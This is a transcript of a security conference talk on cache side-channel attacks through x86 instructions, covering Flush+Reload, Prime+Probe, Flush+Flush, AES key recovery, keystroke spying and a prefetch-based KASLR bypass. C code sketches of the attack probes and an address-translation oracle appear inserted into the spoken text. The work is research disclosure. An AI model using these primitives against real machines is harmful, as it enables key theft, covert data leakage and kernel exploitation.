Music

Herald Angel: We are here with a motto, and the motto of this year is "Works For Me", and I think... how many people in here are programmers? Raise your hands or shout or... Whoa, that's a lot. Okay. So I think many of you work on x86, and I think you assume that it works, and that everything works as intended. And I mean: what could go wrong? Our next talk, the first one today, will be by Clémentine Maurice, who previously was here with Rowhammer.js, something I would call scary, and Moritz Lipp, who has worked on the ARMageddon exploit. So I would like to hear a really warm applause for the speakers of the talk "What could possibly go wrong with <insert x86 instruction here>?". Thank you.

Applause

Clémentine Maurice (CM): Well, thank you all for being here this morning. Yes, this is our talk, "What could possibly go wrong with <insert x86 instruction here>?". Just a few words about ourselves: I'm Clémentine Maurice, I got my PhD in computer science last year, and I'm now working as a postdoc at Graz University of Technology in Austria. You can reach me on Twitter or by email, and there's also, I think, lots of time before the Congress is over.

Moritz Lipp (ML): Hi, my name is Moritz Lipp, I'm a PhD student at Graz University of Technology, and you can also reach me on Twitter, or just after our talk and in the next days.

CM: So, about this talk. The title says this is a talk about x86 instructions, but this is not a talk about software. Don't leave yet! I'm actually even assuming safe software, and the point we want to make is that safe software does not mean safe execution: we have information leakage because of the underlying hardware, and this is what we're going to talk about today. We'll be talking about cache attacks, what they are and what we can do with them, and also about a special kind of cache attack that we found this year: doing cache attacks without memory accesses, and how to use that even to bypass kernel ASLR. And again, the title says x86 instructions, but this is even more global than that: we can also mount these cache attacks on ARM, not only on x86, so some of the examples you will see also apply to ARM. Today we'll have a bit of background first, but most of the background will come along the way, because this talk covers a really huge chunk of our research. We'll see mainly three instructions: "mov", and how we can perform these cache attacks and what they are; "clflush", where we'll be doing cache attacks without any memory accesses; and "prefetch", where we'll bypass kernel ASLR and learn a lot about address-translation levels. Then there's even a bonus track; that part will not be our work, but even more instructions and even more attacks.

Okay, let's start with a bit of an introduction. We will be mainly focusing on Intel CPUs, and this is roughly how they look today in terms of cores and caches. We have different cores, here four cores, and different levels of caches, usually three. Level 1 and level 2 are private to each core, which means that core 0 can only access its own level 1 and level 2, and not the level 1 and level 2 of, for example, core 3. And then we have the last-level cache... so here, if you can see the pointer...
This one is divided into slices: we have as many slices as cores, so here four slices, but all the slices are shared across cores, so core 0 can access the whole last-level cache, slices 0, 1, 2, and 3. We also have a nice property on Intel CPUs: this level of cache is inclusive, which means that everything contained in level 1 and level 2 is also contained in the last-level cache, and this will prove quite useful for cache attacks.

Today we mostly have set-associative caches. This means that data is loaded into a specific set that depends only on its address: some bits of the address give us the index, which says "okay, this line is going to be loaded into this cache set." Then we have several ways per set, here four ways, and the cache line is going to be loaded into a specific way, which depends only on the replacement policy and not on the address itself. When you load a line into the cache, the cache is usually already full, and you have to make room for the new line; this is what the replacement policy does: it decides "okay, I'm going to remove this line to make room for the next one."

So today we're going to see only three instructions, as I've been telling you. The mov instruction does a lot of things, but the only aspect we're interested in is that it can access data in main memory. We're going to see clflush, which removes a cache line from the cache, from the whole cache. And we're going to see prefetch, which prefetches a cache line for future use. We're going to see what they do, the kind of side effects they have, and all the attacks we can do with them. And that's basically all the x86 you need for today, so even if you're not an x86 expert, don't worry: it's not just slides full of assembly. Okay, on to the first one.

ML: We will start with the mov instruction, and actually the first slide is full of code. As you can see, the mov instruction is used to move data from registers to registers, and from main memory and back to main memory; there are many movs you can use, but basically it just moves data, and that's all we need to know. In addition, a lot of exceptions can occur, so you could assume that the checks are so tight that nothing can go wrong when you just move data, because moving data is simple. However, while there are a lot of exceptions, the data that is accessed is always loaded into the cache. This is transparent to the running program, but it has side effects, and we will see what they look like with the mov instruction.

You probably all know that data can be in CPU registers, in the different levels of the cache that Clémentine showed you earlier, in main memory, or on disk, and depending on where the data is located, it takes longer to load it back to the CPU. This is what we can see in this plot: we measure the access time of an address over and over again, assuming that when we access it often, it is already stored in the cache. So most of the time it takes around 70 cycles, and we can assume that when we load an address and it takes 70 cycles, it's loaded from the cache.
However, when the data is loaded from main memory, we can clearly see that it takes much longer, a bit more than 200 cycles. So, depending on the time it takes to load an address, we can say whether the data was in the cache or still in main memory. And this property is what we can exploit using cache attacks: we measure the timing differences of memory accesses. The attacker monitors cache lines, but he has no way to know the actual content of a cache line; he can only observe that a cache line has been accessed, not what is stored in it. With this, you can implement covert channels, allowing two processes to communicate with each other while evading the permission system, as we will see later on. You can also do side-channel attacks, where a malicious application spies on benign processes, and you can use this to steal cryptographic keys or to spy on keystrokes.

We have different types of cache attacks, and I want to explain the most popular one, the "Flush+Reload" attack, first. On the left you have the address space of the victim, and on the right the address space of the attacker, who maps a shared library (an executable that the victim is using) into its own address space, like the red rectangle. This means that when this data is stored in the cache, it is cached for both processes. Now the attacker can use the flush instruction to remove the data from the cache, so it is not cached for the victim either. Then the attacker lets the victim run, and if the victim decides "yeah, I need this data", it is loaded back into the cache. Now the attacker reloads the data, measures how long it takes, and decides: "okay, the victim has accessed the data in the meantime" or "the victim has not accessed the data in the meantime." That way you can spy on whether this address has been used.

The second type of attack is called "Prime+Probe", and it does not rely on shared memory like the Flush+Reload attack. It works as follows: instead of mapping anything into its own address space, the attacker accesses a lot of addresses that map to one cache set, filling it. He again lets the victim run, and the victim may access data that maps to the same cache set, so the cache set is used by the attacker and the victim at the same time. Now the attacker measures the access time to the addresses he loaded into the cache before: when an address is still in the cache, the access is fast; when it is not in the cache anymore, it has to be reloaded and takes longer. Summing this up, he can detect whether the victim has loaded data into the cache set as well.
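To make this concrete, here is a minimal sketch of a Flush+Reload probe in C, assuming x86-64 with GCC or Clang intrinsics; the 150-cycle threshold is purely illustrative and has to be calibrated per machine, as in the histogram just described.

```c
/* Minimal Flush+Reload probe sketch (x86-64, GCC/Clang intrinsics).
 * Assumption: `addr` lies in memory shared with the victim (e.g. a
 * mapped shared library); the 150-cycle threshold is illustrative. */
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_clflush, _mm_mfence */

static inline uint64_t timed_access(volatile uint8_t *addr)
{
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                         /* the memory access we time */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

/* One Flush+Reload round: returns 1 if the victim touched `addr`
 * since the previous flush (a fast reload means a cache hit). */
static int flush_reload(volatile uint8_t *addr)
{
    int hit = timed_access(addr) < 150;  /* reload and time it */
    _mm_clflush((const void *)addr);     /* flush for the next round */
    _mm_mfence();                        /* let the flush settle */
    return hit;
}
```

In a real attack this runs in a loop, with a short wait between flush and reload, giving one observation per victim access.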
The first thing we want to show you is that with cache attacks you can implement a covert channel, and this could happen in the following scenario. You install an app on your phone to view your favorite images and apply some filters, and you don't know that it's malicious, because the only permission it requires is access to your images, which makes sense. So you can easily install it without any fear. In addition, you want to know what the weather is like outside, so you install a nice little weather widget, and the only permission it has is internet access, because it has to load the forecast from somewhere. So what happens if you're able to implement a covert channel between these two applications, without any permissions or privileges, so they can communicate with each other without using any mechanism provided by the operating system, completely hidden? The gallery app can now send your image over to the widget, it gets uploaded to the internet, and it is exposed for everyone. So maybe you don't want to see that cat picture everywhere. While we can do this with both Prime+Probe and Flush+Reload, we will discuss a covert channel using Prime+Probe.

So how can we transmit data? We need to transmit ones and zeros at some point. The sender and the receiver agree on one cache set that they both use, and the receiver probes that set all the time. When the sender wants to transmit a zero, he simply does nothing: the receiver's lines stay in the cache the whole time, and the receiver knows "okay, he's sending nothing, so it's a zero." When the sender wants to transmit a one, he accesses addresses that map to the same cache set, so it takes the receiver longer to access its addresses again, and the receiver knows "okay, the sender just sent me a one." And Clémentine will show you what you can do with this covert channel.
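A rough sketch of this bit encoding might look as follows. Building the eviction set `set[]` (addresses that all map to the agreed cache set) is the hard part and is omitted here, and `WAYS` and `THRESHOLD` are hypothetical, machine-specific values.

```c
/* Sketch of the Prime+Probe covert-channel bit encoding described above.
 * Assumption: `set[]` holds WAYS addresses that all map to the agreed
 * cache set; constructing such an eviction set is omitted here. */
#include <stdint.h>
#include <x86intrin.h>

#define WAYS      16
#define THRESHOLD 1200   /* hypothetical: total probe time separating 0/1 */

/* Receiver: prime the set, wait one slot, then probe it and time it. */
static int receive_bit(volatile uint8_t *set[WAYS])
{
    unsigned aux;
    for (int i = 0; i < WAYS; i++)       /* prime: fill the cache set */
        (void)*set[i];
    /* ... wait for one transmission slot ... */
    uint64_t t0 = __rdtscp(&aux);
    for (int i = 0; i < WAYS; i++)       /* probe: evicted lines are slow */
        (void)*set[i];
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) > THRESHOLD;        /* slow probe: sender sent a 1 */
}

/* Sender: touch the same set for a 1, stay idle for a 0. */
static void send_bit(int bit, volatile uint8_t *set[WAYS])
{
    if (!bit)
        return;                          /* 0: do nothing */
    for (int i = 0; i < WAYS; i++)
        (void)*set[i];                   /* 1: evict the receiver's lines */
}
```

The error detection and correction that Clémentine describes next sit on top of this raw bit channel.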
CM: So the really nice thing about Prime+Probe is that it has really low requirements: it doesn't need any kind of shared memory. If you have two virtual machines, you could get shared memory via memory deduplication, but that is highly insecure, so cloud providers like Amazon EC2 disable it. We can still use Prime+Probe, because it doesn't need shared memory. Another problem with cache covert channels is that they are quite noisy. Other applications running on the system all compete for the cache and might evict cache lines, especially memory-intensive applications, and you also get noise from the fact that the sender and the receiver might not be scheduled at the same time: if the sender transmits while the receiver is not scheduled, part of the transmission is lost. So we tried to build an error-free covert channel. We took care of all these noise issues by using error detection to resynchronize the sender and the receiver, and error correction to fix the remaining errors. We managed to have a completely error-free covert channel even under a lot of noise (say, another virtual machine on the same host serving files through a web server and doing lots of memory-intensive tasks at the same time), and the covert channel stayed completely error-free at around 40 to 75 kilobytes per second, which is still quite a lot. All of this is between virtual machines on Amazon EC2. And the really neat thing, because we wanted to do something with it: we managed to create an SSH connection really over the cache. The two machines have no network between them, but just by sending zeros and ones we have an SSH connection between them. So you could say cache covert channels are nothing, but I think they are a real threat. And if you want more details about this work in particular, it will be published soon at NDSS.

The second application we want to show you is attacking crypto with cache attacks. In particular, we are going to show an attack on AES, on a special implementation of AES that uses T-tables. That's the fast software implementation, because it uses precomputed lookup tables. It has been known to be vulnerable to side-channel attacks since 2006, by Osvik et al., and it's a one-round known-plaintext attack: you have p, your plaintext, and k, your secret key, and the AES algorithm computes an intermediate state at each round r. In the first round, the accessed table indices are just p XOR k. Since it's a known-plaintext attack, if you can recover the accessed table indices, you have also recovered the key, because it's just a XOR. So it would be bad, right, if we could recover these accessed table indices? Well, we can, with cache attacks! We did that with Flush+Reload and with Prime+Probe. On the x-axis you have the plaintext byte values, and on the y-axis you have the addresses, which are essentially the T-table entries. A black cell means that we monitored the cache line and saw a lot of cache hits: basically, the blacker it is, the more certain we are that the T-table entry has been accessed. Here it's a toy example, the key is all zeros, but you would just get a different pattern if the key were not all zeros, and as long as you can see this nice diagonal, or a pattern, you have recovered the key. So it's an old attack: 2006, it's been 10 years, everything should be fixed by now, and you see where I'm going: it's not. On Android, the Bouncy Castle implementation uses the T-tables by default, so that's bad. Many implementations you find online also use precomputed values, so be wary of this kind of attack.

The last application we want to show you is spying on keystrokes. For that we use Flush+Reload, because it's a really fine-grained attack: we can see very precisely which cache line has been accessed, and a cache line is only 64 bytes, which is really not a lot. We're going to use that to spy on keystrokes, and we even have a small demo for you.

ML: What you see on the screen is not Intel x86 but a smartphone, a Galaxy S6; you can apply these cache attacks there as well, and that's what we want to emphasize. On the left you see the screen, and on the right we have connected a shell with no privileges or permissions, so it could basically be an app you installed from the app store. On the right we start our spy tool, and on the left we open the messenger app, and whenever the user hits a key on the keyboard, our spy tool notices it. If he presses the spacebar, we can measure that too. If the user decides "okay, I want to delete the word" because he changed his mind, we can also register that he pressed the backspace key. So in the end we can see exactly how long the words were that the user typed into his phone, without any permissions or privileges, which is bad.

laughs

applause

ML: So, enough about the mov instruction. Let's head to clflush.

CM: The clflush instruction invalidates, from every cache level, the cache line that contains the address you pass to it.
In itself that's already kind of bad, because it enables the Flush+Reload attack we showed earlier: that was just flush, reload, and the flush part is done with clflush. But there's actually more to it, how wonderful. There is a first timing leakage: the clflush instruction takes a different time depending on whether the data you pass to it is cached or not. Imagine you have a cache line in level 1; by the inclusion property, it also has to be in the last-level cache. This is quite convenient, and it's also why Intel CPUs have this inclusion property, for performance reasons: if you want to know whether a line is present anywhere in the cache, you only have to look in the last-level cache. And this is basically what clflush does. It goes to the last-level cache, sees "okay, there's the line, I'm going to flush it", and then something indicates that the line is also present somewhere else, so it flushes the line in level 1 and/or level 2 as well. That's slow. Now, if you perform clflush on data that is not cached, it does the same thing: it goes to the last-level cache, sees that the line is not there, and the data can't be anywhere else in the cache, because if it were anywhere, it would be in the last-level cache. So it does nothing and stops there. That's fast.

How fast and slow exactly? It's actually only a very few cycles. We ran this experiment on different microarchitectures: Sandy Bridge, Ivy Bridge, and Haswell, and the different colors correspond to the different microarchitectures. A first thing that is already kind of funny is that you can distinguish the microarchitectures quite nicely this way, but the real point is that there are really different zones. The solid lines are measurements of clflush on a line that was already in the cache, and the dashed lines on a line that was not in the cache, and on all microarchitectures we can see a difference. It's only a few cycles, and it's a bit noisy, so what could go wrong?

Okay, so exploiting these few cycles, we still managed to build a new cache attack that we call "Flush+Flush". Basically, everything we could do with Flush+Reload we can also do with Flush+Flush: we can build covert channels and side-channel attacks. It's stealthier than previous cache attacks (I'll come back to that), and it's also faster. How does it work? The principle is a bit similar to Flush+Reload. The attacker and the victim share some memory, say a shared library, which is shared in the cache. The attacker starts by flushing the cache line, then lets the victim do whatever it does, say an encryption, and the victim automatically loads some data into the cache. Now the attacker wants to know again whether the victim accessed this precise cache line, and instead of reloading it, he flushes it again. Since clflush's timing differs depending on whether the data is in the cache or not, this gives us the same information as a reload, except it's way faster.
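A minimal sketch of the resulting Flush+Flush probe, assuming the same setup as the Flush+Reload sketch earlier; `FF_THRESHOLD` is a hypothetical per-machine value sitting in the few-cycle gap between the two clflush timings.

```c
/* Flush+Flush probe sketch: time the clflush itself instead of a reload.
 * Assumption: FF_THRESHOLD is hypothetical and sits in the few-cycle gap
 * shown in the plots; because the gap is small and noisy, real attacks
 * repeat the measurement. */
#include <stdint.h>
#include <x86intrin.h>

#define FF_THRESHOLD 130   /* calibrate per machine/microarchitecture */

static int flush_flush(volatile uint8_t *addr)
{
    unsigned aux;
    _mm_mfence();
    uint64_t t0 = __rdtscp(&aux);
    _mm_clflush((const void *)addr);    /* slow if the line was cached */
    uint64_t t1 = __rdtscp(&aux);
    _mm_mfence();
    return (t1 - t0) > FF_THRESHOLD;    /* slow flush: victim accessed it */
}
```

Note that the probe itself never performs a memory access, which is also why Flush+Flush causes so few cache references of its own.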
So, I mentioned stealthiness. The thing is that these cache attacks, and that also applies to Rowhammer, are already stealthy in themselves, because no antivirus today can detect them. But some people thought we could detect them with performance counters, because of the many cache misses and cache references that happen when data is flushed and memory is re-accessed. Now, what we thought is: yes, but other programs also cause lots of cache misses and cache references, so we would like a better metric. These cache attacks have a very heavy activity on the cache, but they are also very particular, because they are very short loops of code: Flush+Reload just flushes one line, reloads the line, and then again flush, reload. That very short loop creates very low pressure on the instruction TLB, which is quite characteristic of cache attacks. So what we decided to do is normalize the cache events, the cache misses and cache references, by events related to the instruction TLB, and with that we managed to detect cache attacks and Rowhammer without any false positives. This is the metric I'm going to use when I talk about stealthiness.
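One possible (hypothetical) realization of such a normalized metric on Linux, using perf counters; the event choice and the cutoff value are assumptions for illustration, not the exact metric from the paper.

```c
/* Hypothetical sketch of a normalized detection metric on Linux:
 * hardware cache misses divided by ITLB accesses, per process.
 * The event selection and the cutoff of 10.0 are illustrative only. */
#define _GNU_SOURCE
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <linux/perf_event.h>

static int perf_open(uint32_t type, uint64_t config, pid_t pid)
{
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = type;
    attr.config = config;
    return (int)syscall(SYS_perf_event_open, &attr, pid, -1, -1, 0UL);
}

int looks_like_cache_attack(pid_t pid)
{
    int misses = perf_open(PERF_TYPE_HARDWARE,
                           PERF_COUNT_HW_CACHE_MISSES, pid);
    int itlb   = perf_open(PERF_TYPE_HW_CACHE,
                           PERF_COUNT_HW_CACHE_ITLB |
                           (PERF_COUNT_HW_CACHE_OP_READ << 8) |
                           (PERF_COUNT_HW_CACHE_RESULT_ACCESS << 16), pid);
    uint64_t m = 0, t = 0;
    sleep(1);                            /* sample for one second */
    read(misses, &m, sizeof(m));
    read(itlb, &t, sizeof(t));
    /* Cache attacks: many cache events, few ITLB events (tiny loop). */
    return t > 0 && (double)m / (double)t > 10.0;
}
```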
So we started by creating a covert channel. First we wanted it as fast as possible, so we created a protocol to evaluate all the kinds of cache attacks we had, Flush+Flush, Flush+Reload, and Prime+Probe, and we started with a packet size of 28, which doesn't really matter. We measured the capacity of our covert channel: Flush+Flush reaches around 500 kB/s, whereas Flush+Reload was only 300 kB/s, so Flush+Flush is already quite an improvement in speed. Then we measured stealthiness: at this speed, only Flush+Flush was stealthy. Now, Flush+Flush and Flush+Reload, as you've seen, have some similarities: as covert channels they share the same sender, only the receivers differ, and here the sender was not stealthy for either of them. Anyway, if you want a fast covert channel, just use Flush+Flush; that works.

Now let's try to make it completely stealthy, because if the sender is not stealthy, it may give away the whole attack. So we said: okay, maybe if we just slow down all the attacks, there will be fewer cache hits and cache misses, and then maybe all the attacks are stealthy. Why not? So we tried that. We slowed everything down, so Flush+Reload and Flush+Flush are around 50 kB/s now; Prime+Probe is a bit slower, because it takes more time to prime and probe everything. But still, even with this slowdown, only Flush+Flush has its receiver stealthy, and now we also managed to have the sender stealthy. So basically, whether you want a fast covert channel or a stealthy covert channel, Flush+Flush is really great.

Then we wanted to evaluate whether it was too noisy to perform side-channel attacks, so we ran the side channel on the AES T-table implementation, the attack we showed you earlier, and counted the number of encryptions needed to determine the upper four bits of a key byte; the lower, the better the attack. Flush+Reload is a bit better, needing only 250 encryptions to recover these bits, but Flush+Flush comes quite close with 350, and Prime+Probe is actually the noisiest of them all, needing close to 5000 encryptions. So Flush+Flush and Flush+Reload have around the same performance.

Now let's evaluate the stealthiness again. What we did here is perform 256 billion encryptions in a synchronous attack, so the spy and the victim were synchronized, and we evaluated the stealthiness of all the attacks; here, again, only Flush+Flush is stealthy. And while you can always slow down a covert channel, you can't actually slow down a side-channel attack, because in a real-life scenario you're not going to say: "Hey victim, wait for me a bit, I'm trying to do an attack here." That won't work.

There's even more to it, but I need a bit more background before continuing. I've shown you the different levels of caches, and here I'm going to focus on the last-level cache. We have our four slices here, this is the last-level cache, and some bits of the address correspond to the set; but more importantly, we need to know in which slice an address is going to be. That is given by some bits of the address, passed into a function that says in which slice the line is going to be. The thing is that this hash function is undocumented by Intel; it wouldn't be fun otherwise. So we have this: as many slices as cores, and an undocumented hash function that maps a physical address to a slice. While that is a bit of a pain for attacks, it was originally designed not for security but for performance, because you want all the accesses to be evenly distributed across the slices. The hash function takes some bits of the physical address and outputs k bits of slice index: just one bit if you have a two-core machine, two bits if you have a four-core machine, and so on.

Now let's go back to clflush and see what the relation is. What we noticed is that clflush is faster to reach a line on the local slice. If you always flush the same line and run your program on core 0, core 1, core 2, and core 3 in turn, you will observe that on one core in particular the clflush is faster. Here it is on core 1, and you can see that on cores 0, 2, and 3 it's a bit slower; so, since we ran the program on core 1 and always flushed the same line, we can deduce that the line belongs to slice 1. With that, we can map physical addresses to slices, and that's one way to reverse-engineer this undocumented addressing function. Funnily enough, it's not the only way: what I did before that was use performance counters to reverse-engineer this function, but that's a whole other story, and if you want more details, there's also an article on that.

ML: The next instruction we want to talk about is the prefetch instruction. Prefetch is used to tell the CPU: "Okay, please load the data I will need later on into the cache, if you have some time." There are actually six different prefetch instructions, prefetcht0 to prefetcht2 and so on, which say: "CPU, please load the data into the first-level cache", or into the last-level cache, whatever you want to use; but we'll spare you the details, because they are not that interesting in the end. What's more interesting is what the Intel manual says about it: "Using the PREFETCH instruction is recommended only if data does not fit in the cache." So you can tell the CPU to load data you want to stream into the cache, so it's more performant.
"Use of software prefetch should be limited to memory addresses that are managed or owned within the application context." So one might wonder what happens if this address is not managed by myself. Sounds interesting. "Prefetching to addresses that are not mapped to physical pages can experience non-deterministic performance penalty. For example specifying a NULL pointer as an address for prefetch can cause long delays." So we don't want to do that because our program will be slow. So, let's take a look what they mean with non-deterministic performance penalty, because we want to write good software, right? But before that, we have to take a look at a little bit more background information to understand the attacks. So on modern operating systems, every application has its own virtual address space. So at some point, the CPU needs to translate these addresses to the physical addresses actually in the DRAM. And for that we have this very complex-looking data structure. So we have a 48-bit virtual address, and some of those bits mapped to a table, like the PM level 4 table, with 512 entries, so depending on those bits the CPU knows, at which line he has to look. And if there is data there, because the address is mapped, he can proceed and look at the page directory, point the table, and so on for the town. So is everything, is the same for each level until you come to your page table, where you have 4-kilobyte pages. So it's in the end not that complicated, but it's a bit confusing, because you want to know a physical address, so you have to look it up somewhere in the, in the main memory with physical addresses to translate your virtual addresses. And if you have to go through all those levels, it needs a long time, so we can do better than that and that's why Intel introduced additional caches, also for all of those levels. So, if you want to translate an address, you take a look at the ITLB for instructions, and the data TLB for data. If it's there, you can stop, otherwise you go down all those levels and if it's not in any cache you have to look it up in the DRAM. In addition, the address space you have is shared, because you have, on the one hand, the user memory and, on the other hand, you have mapped the kernel for convenience and performance also in the address space. And if your user program wants to access some kernel functionality like reading a file, it will switch to the kernel memory there's a privilege escalation, and then you can read the file, and so on. So, that's it. However, you have drivers in the kernel, and if you know the addresses of those drivers, you can do code-reuse attacks, and as a countermeasure, they introduced address-space layout randomization, also for the kernel. And this means that when you have your program running, the kernel is mapped at one address and if you reboot the machine it's not on the same address anymore but somewhere else. So if there is a way to find out at which address the kernel is loaded, you have circumvented this countermeasure and defeated kernel address space layout randomization. So this would be nice for some attacks. In addition, there's also the kernel direct physical map. And what does this mean? It's implemented on many operating systems like OS X, Linux, also on the Xen hypervisor and BSD, but not on Windows. But what it means is that the complete physical memory is mapped in additionally in the kernel memory at a fixed offset. 
In addition, the address space you have is shared: on the one hand you have the user memory, and on the other hand the kernel is also mapped into the address space, for convenience and performance. If your user program wants some kernel functionality, like reading a file, it switches into the kernel memory, there is a switch to a higher privilege level, and then the kernel can read the file, and so on. However, there are drivers in the kernel, and if you know the addresses of those drivers, you can do code-reuse attacks. As a countermeasure, address space layout randomization was introduced, also for the kernel. This means that when your program is running, the kernel is mapped at one address, and if you reboot the machine, it's not at the same address anymore but somewhere else. So if there is a way to find out at which address the kernel is loaded, you have circumvented this countermeasure and defeated kernel address space layout randomization (KASLR). That would be nice for some attacks.

In addition, there is the kernel direct physical map. What does this mean? It's implemented on many operating systems, like OS X, Linux, the Xen hypervisor, and BSD, but not on Windows. It means that the complete physical memory is additionally mapped into the kernel memory at a fixed offset: for every page mapped in user space, there is something like a twin page in the kernel memory, which you can't access, because it's in kernel memory. However, we will need it later, because now we go back to prefetch and see what we can do with it.

Prefetch is not a usual instruction, because it just tells the CPU "I might need that data later on; load it for me if you have time," and if not, the CPU can ignore it, because it's busy with other stuff. So there is no guarantee that this instruction is really executed, but most of the time it is. One interesting property is that it generates no faults: whatever you pass to this instruction, your program won't crash. And it does not check any privileges, so I can also pass a kernel address to it, and it won't say "no, stop, you accessed an address you are not allowed to access, so I crash." It just continues, which is nice. The second interesting thing is that the operand is a virtual address, so every time you execute this instruction, the CPU has to check which physical address the virtual address corresponds to, doing the lookup through all those tables we've seen earlier. And as you have probably guessed, the execution time of the prefetch instruction varies as well, and we will see later what we can do with that.

So let's get back to the direct physical map, because we can build an oracle for address translation: we can find out which physical address belongs to a virtual address. Nowadays you don't want the user to know that, because with that information you can craft nice Rowhammer attacks and more advanced cache attacks, so this information is kept from the user. But let's check if there's still a way to get it. As I told you earlier, if you have a page mapped in user space, you have the twin page in kernel space, and if one is cached, it's cached for both. The attack works as follows. As the attacker, you flush your user-space page, so it's not in the cache, not for the kernel memory either. Then you call prefetch on the kernel address, which, as I told you, you can do without creating any faults. So you tell the CPU: "please load this data into the cache, even though I normally don't have access to it." If we now access our user-space page again and measure a cache hit, because the CPU loaded it into the cache, we know exactly which physical page the kernel address we prefetched corresponds to, and because the direct map is at a fixed offset, a simple subtraction gives us the physical address. So we have a nice way to find the physical address behind a virtual address. In practice this looks like the following plot. It's pretty simple, because we just do this for every address, and at some point we measure a cache hit; there's a huge difference, and exactly at this point we know that this physical address corresponds to our virtual address.

The second thing we can exploit is the timing of the prefetch instruction itself. As I told you, when the CPU walks down the translation levels, at some point it sees "it's here" or "it's not here," so it can abort early. With that, we can know exactly when the prefetch instruction aborted, and learn how the pages are mapped into the address space. So the timing depends on where the translation stops.
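Putting this together, a hedged sketch of the translation oracle might look as follows. `DIRECT_MAP_BASE` and `HIT_THRESHOLD` are hypothetical (the direct-map offset is kernel-specific), and a real attack repeats each probe many times to filter out noise.

```c
/* Sketch of the prefetch address-translation oracle described above.
 * Assumptions: DIRECT_MAP_BASE is the kernel's direct-map offset
 * (kernel-specific, hypothetical here); HIT_THRESHOLD is illustrative. */
#include <stdint.h>
#include <x86intrin.h>

#define DIRECT_MAP_BASE 0xffff880000000000ULL  /* hypothetical offset */
#define HIT_THRESHOLD   150                    /* calibrate per machine */

static inline uint64_t timed_access(volatile uint8_t *addr)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*addr;
    return __rdtscp(&aux) - t0;
}

/* Find the physical address of the page at `page` by probing every
 * candidate physical page through the kernel's direct map. */
uint64_t translate(volatile uint8_t *page, uint64_t phys_mem_size)
{
    for (uint64_t p = 0; p < phys_mem_size; p += 4096) {
        _mm_clflush((const void *)page);        /* flush both twin pages */
        _mm_mfence();
        /* prefetch the candidate kernel address: no fault, no check */
        _mm_prefetch((const char *)(DIRECT_MAP_BASE + p), _MM_HINT_T0);
        _mm_mfence();
        if (timed_access(page) < HIT_THRESHOLD) /* twin got cached? */
            return p;                           /* physical address found */
    }
    return (uint64_t)-1;                        /* not found */
}
```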
Using those two properties, we can do the following. On the one hand, we can build variants of cache attacks: instead of Flush+Reload, we can do Flush+Prefetch, for instance. We can also use prefetch to mount Rowhammer attacks on privileged addresses, because it doesn't fault when we pass those addresses, and it works as well. In addition, we can use it to recover the translation levels of a process, which you could do earlier with the pagemap file; but as I told you, that is now privileged, so you don't have access to it, and by doing this you can bypass address space layout randomization. You can also translate virtual addresses to physical addresses, which is now also privileged via the pagemap file, and that re-enables ret2dir exploits, which were demonstrated last year. On top of that, we can use this to locate kernel drivers, as I told you: it would be nice if we could circumvent KASLR as well, and I will show you now how this is possible. With the first oracle, we find all the pages that are mapped, and for each of those pages we evict the translation caches; we can do that by either calling sleep, which schedules another program, or by accessing a large memory buffer. Then we perform a syscall to the driver, so driver code is executed and loaded into the cache, and then we just measure the time prefetch takes on this address. In the end, the page with the fastest average access time is the driver page. We can mount this attack on Windows 10 in less than 12 seconds; so we can defeat KASLR in less than 12 seconds, which is very nice. In practice, the measurements look like the following: we have a lot of high measurements, and at some point there is a low one, and then you know exactly that this is the driver region and the address where the driver is located. And you can mount those ret2dir attacks again. However, that's not everything, because there are more instructions on Intel CPUs.

CM: Yeah, so the following is not our work, but we thought it would be interesting, because it's basically more instructions, more attacks, more fun. There's the RDSEED instruction, which requests a random seed from the hardware random number generator. The thing is that there is a fixed number of precomputed random bits, and it takes time to regenerate them. So, like everything that takes time, you can create a covert channel with it. There are also FADD and FMUL, floating-point operations whose running time depends on the operands; some people managed to bypass Firefox's same-origin policy with an SVG filter timing attack based on that. There are also the JMP instructions: modern CPUs have branch prediction and branch target prediction, and this has actually been studied a lot. You can create covert channels, do side-channel attacks on crypto, and also bypass KASLR. And finally, there are the TSX instructions, an extension for hardware transactional memory support, which have also been used to bypass KASLR. So, in case you're not sure: KASLR is dead. You have lots of different things to read.

Okay, on to the conclusion now. As you've seen, this is actually more a problem of CPU design than of the instruction set architecture itself. The thing is that all these issues are really hard to patch. They are all linked to performance optimizations, and we are not getting rid of performance optimizations.
That's basically a trade-off between performance and security, and performance seems to always win. There have been some proposals against cache attacks, for instance removing the clflush instruction. The thing is that all these quick fixes won't work, because we always find new ways to do the same thing without these precise instructions, and we also keep finding new instructions that leak information. So it's really quite a big topic that we have to fix. Thank you very much for your attention. If you have any questions, we'd be happy to answer them.

applause

Herald: Okay. Thank you very much again for your talk, and now we will have a Q&A; we have, I think, about 15 minutes, so you can start lining up behind the microphones. They are in the gangways in the middle. Except, I think, that one... oh no, it's back up, so it will work. And while we wait, I think we will take questions from our signal angel, if there are any. Okay, there aren't any, so: microphone questions. You in front, I think.

Microphone: Hi. Can you hear me?

Herald: Try again.

Microphone: Okay, can you hear me now? Okay. Yeah, I'd like to know what exactly your stealthiness metric was. Was it that you can't distinguish it from a normal process, or...?

CM: So...

Herald: Wait a second. We still have Q&A, so could you quiet down a bit? That would be nice.

CM: So, the question was about the stealthiness metric. Basically, we use the metric with cache misses and cache references, normalized by the instruction TLB events, and we just found a threshold such that pretty much every benign application was below it, and Rowhammer and cache attacks were above it. So we fixed the threshold, basically.

Herald: That microphone.

Microphone: Hello. Thanks for your talk, it was great. First question: did you inform Intel before doing this talk?

CM: Nope.

Microphone: Okay. Second question: what are your future plans?

CM: Sorry?

Microphone: What are your future plans?

CM: Ah, future plans. Well, something that would be interesting: we keep finding these more or less by accident, or manually, so having a good idea of what the attack surface is here would be a good thing, and doing that automatically would be even better.

Microphone: Great, thanks.

Herald: Okay, the microphone in the back, over there. The guy in white.

Microphone: Hi. One question: if you have, like, a daemon that randomly invalidates some cache lines, would that be a better countermeasure than disabling the caches?

ML: What was the question?

CM: Whether invalidating cache lines would be better than disabling the whole cache. So, I'm...

